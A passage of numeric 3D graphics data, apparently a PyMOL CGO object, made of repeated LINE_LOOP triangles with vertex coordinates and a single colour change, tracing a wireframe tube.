VERTEX, 10.806, 34.376, 23.775,
VERTEX, 11.153, 34.548, 23.467,
VERTEX, 10.641, 34.391, 23.617,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.153, 34.548, 23.467,
VERTEX, 10.641, 34.391, 23.617,
VERTEX, 11.003, 34.583, 23.297,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.641, 34.391, 23.617,
VERTEX, 11.003, 34.583, 23.297,
VERTEX, 10.493, 34.555, 23.551,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.003, 34.583, 23.297,
VERTEX, 10.493, 34.555, 23.551,
VERTEX, 10.859, 34.752, 23.239,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.493, 34.555, 23.551,
VERTEX, 10.859, 34.752, 23.239,
VERTEX, 10.450, 34.770, 23.617,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.859, 34.752, 23.239,
VERTEX, 10.450, 34.770, 23.617,
VERTEX, 10.805, 34.957, 23.328,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.450, 34.770, 23.617,
VERTEX, 10.805, 34.957, 23.328,
VERTEX, 10.537, 34.912, 23.775,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.805, 34.957, 23.328,
VERTEX, 10.537, 34.912, 23.775,
VERTEX, 10.873, 35.077, 23.512,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.537, 34.912, 23.775,
VERTEX, 10.873, 35.077, 23.512,
VERTEX, 10.703, 34.897, 23.933,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.873, 35.077, 23.512,
VERTEX, 10.703, 34.897, 23.933,
VERTEX, 11.023, 35.042, 23.682,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.703, 34.897, 23.933,
VERTEX, 11.023, 35.042, 23.682,
VERTEX, 10.850, 34.734, 23.999,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.023, 35.042, 23.682,
VERTEX, 10.850, 34.734, 23.999,
VERTEX, 11.168, 34.873, 23.739,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.850, 34.734, 23.999,
VERTEX, 11.168, 34.873, 23.739,
VERTEX, 10.893, 34.518, 23.933,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.168, 34.873, 23.739,
VERTEX, 10.893, 34.518, 23.933,
VERTEX, 11.222, 34.668, 23.650,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.893, 34.518, 23.933,
VERTEX, 11.222, 34.668, 23.650,
VERTEX, 10.806, 34.376, 23.775,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.222, 34.668, 23.650,
VERTEX, 10.806, 34.376, 23.775,
VERTEX, 11.153, 34.548, 23.467,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.153, 34.548, 23.467,
VERTEX, 11.539, 34.800, 23.194,
VERTEX, 11.003, 34.583, 23.297,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.539, 34.800, 23.194,
VERTEX, 11.003, 34.583, 23.297,
VERTEX, 11.401, 34.855, 23.019,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.003, 34.583, 23.297,
VERTEX, 11.401, 34.855, 23.019,
VERTEX, 10.859, 34.752, 23.239,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.401, 34.855, 23.019,
VERTEX, 10.859, 34.752, 23.239,
VERTEX, 11.259, 35.029, 22.973,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.859, 34.752, 23.239,
VERTEX, 11.259, 35.029, 22.973,
VERTEX, 10.805, 34.957, 23.328,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.259, 35.029, 22.973,
VERTEX, 10.805, 34.957, 23.328,
VERTEX, 11.196, 35.221, 23.082,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.805, 34.957, 23.328,
VERTEX, 11.196, 35.221, 23.082,
VERTEX, 10.873, 35.077, 23.512,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.196, 35.221, 23.082,
VERTEX, 10.873, 35.077, 23.512,
VERTEX, 11.249, 35.318, 23.284,
END,
BEGIN, LINE_LOOP,
VERTEX, 10.873, 35.077, 23.512,
VERTEX, 11.249, 35.318, 23.284,
VERTEX, 11.023, 35.042, 23.682,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.249, 35.318, 23.284,
VERTEX, 11.023, 35.042, 23.682,
VERTEX, 11.387, 35.263, 23.459,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.023, 35.042, 23.682,
VERTEX, 11.387, 35.263, 23.459,
VERTEX, 11.168, 34.873, 23.739,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.387, 35.263, 23.459,
VERTEX, 11.168, 34.873, 23.739,
VERTEX, 11.529, 35.089, 23.505,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.168, 34.873, 23.739,
VERTEX, 11.529, 35.089, 23.505,
VERTEX, 11.222, 34.668, 23.650,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.529, 35.089, 23.505,
VERTEX, 11.222, 34.668, 23.650,
VERTEX, 11.592, 34.897, 23.396,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.222, 34.668, 23.650,
VERTEX, 11.592, 34.897, 23.396,
VERTEX, 11.153, 34.548, 23.467,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.592, 34.897, 23.396,
VERTEX, 11.153, 34.548, 23.467,
VERTEX, 11.539, 34.800, 23.194,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.539, 34.800, 23.194,
VERTEX, 11.914, 35.093, 22.971,
VERTEX, 11.401, 34.855, 23.019,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.914, 35.093, 22.971,
VERTEX, 11.401, 34.855, 23.019,
VERTEX, 11.782, 35.163, 22.797,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.401, 34.855, 23.019,
VERTEX, 11.782, 35.163, 22.797,
VERTEX, 11.259, 35.029, 22.973,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.782, 35.163, 22.797,
VERTEX, 11.259, 35.029, 22.973,
VERTEX, 11.640, 35.340, 22.762,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.259, 35.029, 22.973,
VERTEX, 11.640, 35.340, 22.762,
VERTEX, 11.196, 35.221, 23.082,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.640, 35.340, 22.762,
VERTEX, 11.196, 35.221, 23.082,
VERTEX, 11.573, 35.521, 22.886,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.196, 35.221, 23.082,
VERTEX, 11.573, 35.521, 22.886,
VERTEX, 11.249, 35.318, 23.284,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.573, 35.521, 22.886,
VERTEX, 11.249, 35.318, 23.284,
VERTEX, 11.618, 35.599, 23.097,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.249, 35.318, 23.284,
VERTEX, 11.618, 35.599, 23.097,
VERTEX, 11.387, 35.263, 23.459,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.618, 35.599, 23.097,
VERTEX, 11.387, 35.263, 23.459,
VERTEX, 11.751, 35.528, 23.271,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.387, 35.263, 23.459,
VERTEX, 11.751, 35.528, 23.271,
VERTEX, 11.529, 35.089, 23.505,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.751, 35.528, 23.271,
VERTEX, 11.529, 35.089, 23.505,
VERTEX, 11.892, 35.351, 23.306,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.529, 35.089, 23.505,
VERTEX, 11.892, 35.351, 23.306,
VERTEX, 11.592, 34.897, 23.396,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.892, 35.351, 23.306,
VERTEX, 11.592, 34.897, 23.396,
VERTEX, 11.960, 35.170, 23.182,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.592, 34.897, 23.396,
VERTEX, 11.960, 35.170, 23.182,
VERTEX, 11.539, 34.800, 23.194,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.960, 35.170, 23.182,
VERTEX, 11.539, 34.800, 23.194,
VERTEX, 11.914, 35.093, 22.971,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.914, 35.093, 22.971,
VERTEX, 12.242, 35.375, 22.800,
VERTEX, 11.782, 35.163, 22.797,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.242, 35.375, 22.800,
VERTEX, 11.782, 35.163, 22.797,
VERTEX, 12.115, 35.458, 22.628,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.782, 35.163, 22.797,
VERTEX, 12.115, 35.458, 22.628,
VERTEX, 11.640, 35.340, 22.762,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.115, 35.458, 22.628,
VERTEX, 11.640, 35.340, 22.762,
VERTEX, 11.974, 35.637, 22.602,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.640, 35.340, 22.762,
VERTEX, 11.974, 35.637, 22.602,
VERTEX, 11.573, 35.521, 22.886,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.974, 35.637, 22.602,
VERTEX, 11.573, 35.521, 22.886,
VERTEX, 11.901, 35.808, 22.738,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.573, 35.521, 22.886,
VERTEX, 11.901, 35.808, 22.738,
VERTEX, 11.618, 35.599, 23.097,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.901, 35.808, 22.738,
VERTEX, 11.618, 35.599, 23.097,
VERTEX, 11.940, 35.869, 22.956,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.618, 35.599, 23.097,
VERTEX, 11.940, 35.869, 22.956,
VERTEX, 11.751, 35.528, 23.271,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.940, 35.869, 22.956,
VERTEX, 11.751, 35.528, 23.271,
VERTEX, 12.067, 35.785, 23.128,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.751, 35.528, 23.271,
VERTEX, 12.067, 35.785, 23.128,
VERTEX, 11.892, 35.351, 23.306,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.067, 35.785, 23.128,
VERTEX, 11.892, 35.351, 23.306,
VERTEX, 12.208, 35.606, 23.154,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.892, 35.351, 23.306,
VERTEX, 12.208, 35.606, 23.154,
VERTEX, 11.960, 35.170, 23.182,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.208, 35.606, 23.154,
VERTEX, 11.960, 35.170, 23.182,
VERTEX, 12.281, 35.436, 23.017,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.960, 35.170, 23.182,
VERTEX, 12.281, 35.436, 23.017,
VERTEX, 11.914, 35.093, 22.971,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.281, 35.436, 23.017,
VERTEX, 11.914, 35.093, 22.971,
VERTEX, 12.242, 35.375, 22.800,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.242, 35.375, 22.800,
VERTEX, 12.538, 35.649, 22.680,
VERTEX, 12.115, 35.458, 22.628,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.538, 35.649, 22.680,
VERTEX, 12.115, 35.458, 22.628,
VERTEX, 12.420, 35.746, 22.509,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.115, 35.458, 22.628,
VERTEX, 12.420, 35.746, 22.509,
VERTEX, 11.974, 35.637, 22.602,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.420, 35.746, 22.509,
VERTEX, 11.974, 35.637, 22.602,
VERTEX, 12.278, 35.926, 22.492,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.974, 35.637, 22.602,
VERTEX, 12.278, 35.926, 22.492,
VERTEX, 11.901, 35.808, 22.738,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.278, 35.926, 22.492,
VERTEX, 11.901, 35.808, 22.738,
VERTEX, 12.197, 36.083, 22.638,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.901, 35.808, 22.738,
VERTEX, 12.197, 36.083, 22.638,
VERTEX, 11.940, 35.869, 22.956,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.197, 36.083, 22.638,
VERTEX, 11.940, 35.869, 22.956,
VERTEX, 12.223, 36.126, 22.862,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.940, 35.869, 22.956,
VERTEX, 12.223, 36.126, 22.862,
VERTEX, 12.067, 35.785, 23.128,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.223, 36.126, 22.862,
VERTEX, 12.067, 35.785, 23.128,
VERTEX, 12.341, 36.028, 23.033,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.067, 35.785, 23.128,
VERTEX, 12.341, 36.028, 23.033,
VERTEX, 12.208, 35.606, 23.154,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.341, 36.028, 23.033,
VERTEX, 12.208, 35.606, 23.154,
VERTEX, 12.483, 35.848, 23.050,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.208, 35.606, 23.154,
VERTEX, 12.483, 35.848, 23.050,
VERTEX, 12.281, 35.436, 23.017,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.483, 35.848, 23.050,
VERTEX, 12.281, 35.436, 23.017,
VERTEX, 12.564, 35.691, 22.904,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.281, 35.436, 23.017,
VERTEX, 12.564, 35.691, 22.904,
VERTEX, 12.242, 35.375, 22.800,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.564, 35.691, 22.904,
VERTEX, 12.242, 35.375, 22.800,
VERTEX, 12.538, 35.649, 22.680,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.538, 35.649, 22.680,
VERTEX, 12.814, 35.916, 22.612,
VERTEX, 12.420, 35.746, 22.509,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.814, 35.916, 22.612,
VERTEX, 12.420, 35.746, 22.509,
VERTEX, 12.707, 36.028, 22.443,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.420, 35.746, 22.509,
VERTEX, 12.707, 36.028, 22.443,
VERTEX, 12.278, 35.926, 22.492,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.707, 36.028, 22.443,
VERTEX, 12.278, 35.926, 22.492,
VERTEX, 12.564, 36.208, 22.432,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.278, 35.926, 22.492,
VERTEX, 12.564, 36.208, 22.432,
VERTEX, 12.197, 36.083, 22.638,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.564, 36.208, 22.432,
VERTEX, 12.197, 36.083, 22.638,
VERTEX, 12.470, 36.349, 22.586,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.197, 36.083, 22.638,
VERTEX, 12.470, 36.349, 22.586,
VERTEX, 12.223, 36.126, 22.862,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.470, 36.349, 22.586,
VERTEX, 12.223, 36.126, 22.862,
VERTEX, 12.478, 36.369, 22.815,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.223, 36.126, 22.862,
VERTEX, 12.478, 36.369, 22.815,
VERTEX, 12.341, 36.028, 23.033,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.478, 36.369, 22.815,
VERTEX, 12.341, 36.028, 23.033,
VERTEX, 12.585, 36.257, 22.984,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.341, 36.028, 23.033,
VERTEX, 12.585, 36.257, 22.984,
VERTEX, 12.483, 35.848, 23.050,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.585, 36.257, 22.984,
VERTEX, 12.483, 35.848, 23.050,
VERTEX, 12.728, 36.077, 22.994,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.483, 35.848, 23.050,
VERTEX, 12.728, 36.077, 22.994,
VERTEX, 12.564, 35.691, 22.904,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.728, 36.077, 22.994,
VERTEX, 12.564, 35.691, 22.904,
VERTEX, 12.823, 35.936, 22.840,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.564, 35.691, 22.904,
VERTEX, 12.823, 35.936, 22.840,
VERTEX, 12.538, 35.649, 22.680,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.823, 35.936, 22.840,
VERTEX, 12.538, 35.649, 22.680,
VERTEX, 12.814, 35.916, 22.612,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.814, 35.916, 22.612,
VERTEX, 13.081, 36.174, 22.595,
VERTEX, 12.707, 36.028, 22.443,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.081, 36.174, 22.595,
VERTEX, 12.707, 36.028, 22.443,
VERTEX, 12.987, 36.303, 22.430,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.707, 36.028, 22.443,
VERTEX, 12.987, 36.303, 22.430,
VERTEX, 12.564, 36.208, 22.432,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.987, 36.303, 22.430,
VERTEX, 12.564, 36.208, 22.432,
VERTEX, 12.842, 36.481, 22.426,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.564, 36.208, 22.432,
VERTEX, 12.842, 36.481, 22.426,
VERTEX, 12.470, 36.349, 22.586,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.842, 36.481, 22.426,
VERTEX, 12.470, 36.349, 22.586,
VERTEX, 12.731, 36.604, 22.586,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.470, 36.349, 22.586,
VERTEX, 12.731, 36.604, 22.586,
VERTEX, 12.478, 36.369, 22.815,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.731, 36.604, 22.586,
VERTEX, 12.478, 36.369, 22.815,
VERTEX, 12.720, 36.600, 22.815,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.478, 36.369, 22.815,
VERTEX, 12.720, 36.600, 22.815,
VERTEX, 12.585, 36.257, 22.984,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.720, 36.600, 22.815,
VERTEX, 12.585, 36.257, 22.984,
VERTEX, 12.814, 36.472, 22.980,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.585, 36.257, 22.984,
VERTEX, 12.814, 36.472, 22.980,
VERTEX, 12.728, 36.077, 22.994,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.814, 36.472, 22.980,
VERTEX, 12.728, 36.077, 22.994,
VERTEX, 12.959, 36.293, 22.984,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.728, 36.077, 22.994,
VERTEX, 12.959, 36.293, 22.984,
VERTEX, 12.823, 35.936, 22.840,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.959, 36.293, 22.984,
VERTEX, 12.823, 35.936, 22.840,
VERTEX, 13.070, 36.170, 22.825,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.823, 35.936, 22.840,
VERTEX, 13.070, 36.170, 22.825,
VERTEX, 12.814, 35.916, 22.612,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.070, 36.170, 22.825,
VERTEX, 12.814, 35.916, 22.612,
VERTEX, 13.081, 36.174, 22.595,
END,
COLOR, 0.000, 0.878, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 13.081, 36.174, 22.595,
VERTEX, 13.349, 36.425, 22.631,
VERTEX, 12.987, 36.303, 22.430,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.349, 36.425, 22.631,
VERTEX, 12.987, 36.303, 22.430,
VERTEX, 13.266, 36.570, 22.473,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.987, 36.303, 22.430,
VERTEX, 13.266, 36.570, 22.473,
VERTEX, 12.842, 36.481, 22.426,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.266, 36.570, 22.473,
VERTEX, 12.842, 36.481, 22.426,
VERTEX, 13.119, 36.746, 22.476,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.842, 36.481, 22.426,
VERTEX, 13.119, 36.746, 22.476,
VERTEX, 12.731, 36.604, 22.586,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.119, 36.746, 22.476,
VERTEX, 12.731, 36.604, 22.586,
VERTEX, 12.993, 36.849, 22.638,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.731, 36.604, 22.586,
VERTEX, 12.993, 36.849, 22.638,
VERTEX, 12.720, 36.600, 22.815,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.993, 36.849, 22.638,
VERTEX, 12.720, 36.600, 22.815,
VERTEX, 12.961, 36.819, 22.863,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.720, 36.600, 22.815,
VERTEX, 12.961, 36.819, 22.863,
VERTEX, 12.814, 36.472, 22.980,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.961, 36.819, 22.863,
VERTEX, 12.814, 36.472, 22.980,
VERTEX, 13.044, 36.674, 23.020,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.814, 36.472, 22.980,
VERTEX, 13.044, 36.674, 23.020,
VERTEX, 12.959, 36.293, 22.984,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.044, 36.674, 23.020,
VERTEX, 12.959, 36.293, 22.984,
VERTEX, 13.191, 36.498, 23.018,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.959, 36.293, 22.984,
VERTEX, 13.191, 36.498, 23.018,
VERTEX, 13.070, 36.170, 22.825,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.191, 36.498, 23.018,
VERTEX, 13.070, 36.170, 22.825,
VERTEX, 13.318, 36.395, 22.856,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.070, 36.170, 22.825,
VERTEX, 13.318, 36.395, 22.856,
VERTEX, 13.081, 36.174, 22.595,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.318, 36.395, 22.856,
VERTEX, 13.081, 36.174, 22.595,
VERTEX, 13.349, 36.425, 22.631,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.349, 36.425, 22.631,
VERTEX, 13.628, 36.666, 22.716,
VERTEX, 13.266, 36.570, 22.473,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.628, 36.666, 22.716,
VERTEX, 13.266, 36.570, 22.473,
VERTEX, 13.554, 36.827, 22.570,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.266, 36.570, 22.473,
VERTEX, 13.554, 36.827, 22.570,
VERTEX, 13.119, 36.746, 22.476,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.554, 36.827, 22.570,
VERTEX, 13.119, 36.746, 22.476,
VERTEX, 13.403, 36.999, 22.581,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.119, 36.746, 22.476,
VERTEX, 13.403, 36.999, 22.581,
VERTEX, 12.993, 36.849, 22.638,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.403, 36.999, 22.581,
VERTEX, 12.993, 36.849, 22.638,
VERTEX, 13.263, 37.082, 22.743,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.993, 36.849, 22.638,
VERTEX, 13.263, 37.082, 22.743,
VERTEX, 12.961, 36.819, 22.863,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.263, 37.082, 22.743,
VERTEX, 12.961, 36.819, 22.863,
VERTEX, 13.216, 37.027, 22.961,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.961, 36.819, 22.863,
VERTEX, 13.216, 37.027, 22.961,
VERTEX, 13.044, 36.674, 23.020,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.216, 37.027, 22.961,
VERTEX, 13.044, 36.674, 23.020,
VERTEX, 13.290, 36.866, 23.107,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.044, 36.674, 23.020,
VERTEX, 13.290, 36.866, 23.107,
VERTEX, 13.191, 36.498, 23.018,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.290, 36.866, 23.107,
VERTEX, 13.191, 36.498, 23.018,
VERTEX, 13.440, 36.694, 23.096,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.191, 36.498, 23.018,
VERTEX, 13.440, 36.694, 23.096,
VERTEX, 13.318, 36.395, 22.856,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.440, 36.694, 23.096,
VERTEX, 13.318, 36.395, 22.856,
VERTEX, 13.581, 36.611, 22.934,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.318, 36.395, 22.856,
VERTEX, 13.581, 36.611, 22.934,
VERTEX, 13.349, 36.425, 22.631,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.581, 36.611, 22.934,
VERTEX, 13.349, 36.425, 22.631,
VERTEX, 13.628, 36.666, 22.716,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.628, 36.666, 22.716,
VERTEX, 13.929, 36.898, 22.851,
VERTEX, 13.554, 36.827, 22.570,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.929, 36.898, 22.851,
VERTEX, 13.554, 36.827, 22.570,
VERTEX, 13.860, 37.072, 22.719,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.554, 36.827, 22.570,
VERTEX, 13.860, 37.072, 22.719,
VERTEX, 13.403, 36.999, 22.581,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.860, 37.072, 22.719,
VERTEX, 13.403, 36.999, 22.581,
VERTEX, 13.705, 37.241, 22.740,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.403, 36.999, 22.581,
VERTEX, 13.705, 37.241, 22.740,
VERTEX, 13.263, 37.082, 22.743,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.705, 37.241, 22.740,
VERTEX, 13.263, 37.082, 22.743,
VERTEX, 13.555, 37.303, 22.902,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.263, 37.082, 22.743,
VERTEX, 13.555, 37.303, 22.902,
VERTEX, 13.216, 37.027, 22.961,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.555, 37.303, 22.902,
VERTEX, 13.216, 37.027, 22.961,
VERTEX, 13.497, 37.224, 23.110,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.216, 37.027, 22.961,
VERTEX, 13.497, 37.224, 23.110,
VERTEX, 13.290, 36.866, 23.107,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.497, 37.224, 23.110,
VERTEX, 13.290, 36.866, 23.107,
VERTEX, 13.566, 37.049, 23.242,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.290, 36.866, 23.107,
VERTEX, 13.566, 37.049, 23.242,
VERTEX, 13.440, 36.694, 23.096,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.566, 37.049, 23.242,
VERTEX, 13.440, 36.694, 23.096,
VERTEX, 13.721, 36.881, 23.221,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.440, 36.694, 23.096,
VERTEX, 13.721, 36.881, 23.221,
VERTEX, 13.581, 36.611, 22.934,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.721, 36.881, 23.221,
VERTEX, 13.581, 36.611, 22.934,
VERTEX, 13.871, 36.818, 23.059,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.581, 36.611, 22.934,
VERTEX, 13.871, 36.818, 23.059,
VERTEX, 13.628, 36.666, 22.716,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.871, 36.818, 23.059,
VERTEX, 13.628, 36.666, 22.716,
VERTEX, 13.929, 36.898, 22.851,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.929, 36.898, 22.851,
VERTEX, 14.264, 37.121, 23.034,
VERTEX, 13.860, 37.072, 22.719,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.264, 37.121, 23.034,
VERTEX, 13.860, 37.072, 22.719,
VERTEX, 14.196, 37.308, 22.920,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.860, 37.072, 22.719,
VERTEX, 14.196, 37.308, 22.920,
VERTEX, 13.705, 37.241, 22.740,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.196, 37.308, 22.920,
VERTEX, 13.705, 37.241, 22.740,
VERTEX, 14.036, 37.470, 22.953,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.705, 37.241, 22.740,
VERTEX, 14.036, 37.470, 22.953,
VERTEX, 13.555, 37.303, 22.902,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.036, 37.470, 22.953,
VERTEX, 13.555, 37.303, 22.902,
VERTEX, 13.879, 37.512, 23.116,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.555, 37.303, 22.902,
VERTEX, 13.879, 37.512, 23.116,
VERTEX, 13.497, 37.224, 23.110,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.879, 37.512, 23.116,
VERTEX, 13.497, 37.224, 23.110,
VERTEX, 13.817, 37.410, 23.311,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.497, 37.224, 23.110,
VERTEX, 13.817, 37.410, 23.311,
VERTEX, 13.566, 37.049, 23.242,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.817, 37.410, 23.311,
VERTEX, 13.566, 37.049, 23.242,
VERTEX, 13.885, 37.223, 23.426,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.566, 37.049, 23.242,
VERTEX, 13.885, 37.223, 23.426,
VERTEX, 13.721, 36.881, 23.221,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.885, 37.223, 23.426,
VERTEX, 13.721, 36.881, 23.221,
VERTEX, 14.045, 37.061, 23.392,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.721, 36.881, 23.221,
VERTEX, 14.045, 37.061, 23.392,
VERTEX, 13.871, 36.818, 23.059,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.045, 37.061, 23.392,
VERTEX, 13.871, 36.818, 23.059,
VERTEX, 14.202, 37.019, 23.230,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.871, 36.818, 23.059,
VERTEX, 14.202, 37.019, 23.230,
VERTEX, 13.929, 36.898, 22.851,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.202, 37.019, 23.230,
VERTEX, 13.929, 36.898, 22.851,
VERTEX, 14.264, 37.121, 23.034,
END,
BEGIN, LINE_LOOP,
